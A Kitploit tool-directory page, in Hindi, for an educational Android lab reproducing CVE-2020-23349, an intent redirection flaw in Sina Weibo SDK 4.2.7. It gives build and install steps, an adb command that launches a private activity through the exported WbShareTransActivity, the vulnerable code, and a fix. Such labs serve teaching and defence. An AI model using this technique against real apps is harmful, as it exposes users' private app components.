Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/lazybear8372/cve-2020-23349_lab
एंड्रॉइड सुरक्षाभेद्यता विश्लेषणशोषणमोबाइल ऐप पेंटेस्टिंगमोबाइल सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHublazybear8372/cve-2020-23349_lab

CVE-2020-23349_Lab

Sina Weibo SDK 4.2.7 में CVE-2020-23349 के लिए शैक्षणिक एंड्रॉइड लैब

रिपॉजिटरी देखें
10 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-23349 एंड्रॉइड लैब

यह Sina Weibo एंड्रॉइड SDK 4.2.7 की Intent Redirection भेद्यता को स्थानीय रूप से पुनरुत्पादित करने वाला एक शैक्षिक प्रोजेक्ट है।

केवल अधिकृत टेस्ट डिवाइस या एमुलेटर पर उपयोग करें। इसे वास्तविक उपयोगकर्ता ऐप्स के विरुद्ध उपयोग न करें।

संरचना

  • victim: वास्तविक openDefault-4.2.7.aar युक्त कमजोर ऐप
  • attacker: exported WbShareTransActivity को कॉल करने वाला हमलावर ऐप
  • victim/.../PrivateActivity: android:exported="false" वाला पुनरुत्पादन लक्ष्य

इस भेद्यता का प्रवाह इस प्रकार है:

root@kitploit:~
Attacker 앱
  -> exported WbShareTransActivity
  -> Intent Extra의 startActivity/gotoActivity
  -> victim의 PrivateActivity 실행

बिल्ड

Android SDK 36 और JDK 17 की आवश्यकता है।

root@kitploit:~
./gradlew clean assembleDebug

उत्पन्न फ़ाइलें:

root@kitploit:~
victim/build/outputs/apk/debug/victim-debug.apk
attacker/build/outputs/apk/debug/attacker-debug.apk

इंस्टॉलेशन और पुनरुत्पादन

root@kitploit:~
adb install -r victim/build/outputs/apk/debug/victim-debug.apk
adb install -r attacker/build/outputs/apk/debug/attacker-debug.apk
adb shell am start -n lab.cve202023349.attacker/.MainActivity
  1. यदि आवश्यक हो, Victim ऐप को एक बार चलाएँ।
  2. Attacker ऐप में Launch private Activity बटन दबाएँ।
  3. यदि EXPLOIT SUCCESS स्क्रीन दिखाई देती है, तो पुनरुत्पादन सफल है।

आप ADB से सीधे भी पुनरुत्पादन कर सकते हैं।

root@kitploit:~
adb shell am start \
  -n lab.cve202023349.victim/com.sina.weibo.sdk.share.WbShareTransActivity \
  --es startActivity lab.cve202023349.victim.PrivateActivity \
  --es gotoActivity lab.cve202023349.victim.PrivateActivity

यह क्यों काम करता है

SDK 4.2.7 बाहरी Intent के startActivity और gotoActivity स्ट्रिंग्स पर भरोसा करता है और उन्हें निम्नलिखित रूप में उपयोग करता है:

root@kitploit:~
resultIntent.setClassName(this, startActivityName);
startActivity(resultIntent);

चूँकि this Victim ऐप का Context है, Android इसे Victim ऐप द्वारा अपनी private Activity चलाने के रूप में मानता है।

आधुनिक Android बिल्ड में android:exported को स्पष्ट रूप से निर्दिष्ट करना आवश्यक होता है, इसलिए यह प्रोजेक्ट पुराने SDK की अंतर्निहित exported स्थिति को पुनरुत्पादित करने के लिए victim/AndroidManifest.xml में स्पष्ट रूप से true निर्धारित करता है।

शमन अभ्यास

जिन अभ्यासों में शेयरिंग सुविधा की आवश्यकता नहीं है, उनमें निम्नलिखित मान को false में बदलें और पुनः बिल्ड करें।

root@kitploit:~
<activity
    android:name="com.sina.weibo.sdk.share.WbShareTransActivity"
    android:exported="false" />

बाद में यदि वही हमला किया जाता है, तो इसे SecurityException द्वारा अवरुद्ध कर दिया जाएगा। वास्तविक उत्पाद में Weibo SDK 4.x को हटाकर नवीनतम अनुरक्षित संस्करण में अपग्रेड करना चाहिए।

SDK स्रोत

शामिल AAR Sina Weibo आधिकारिक सार्वजनिक रिपॉजिटरी के 4.2.7 कमिट से लिया गया है।

  • रिपॉजिटरी: https://github.com/sinaweibosdk/weibo_android_sdk
  • कमिट: 99daf8a (4.2.7)
  • फ़ाइल: 新文档/openDefault-4.2.7.aar
टूल डाउनलोड करें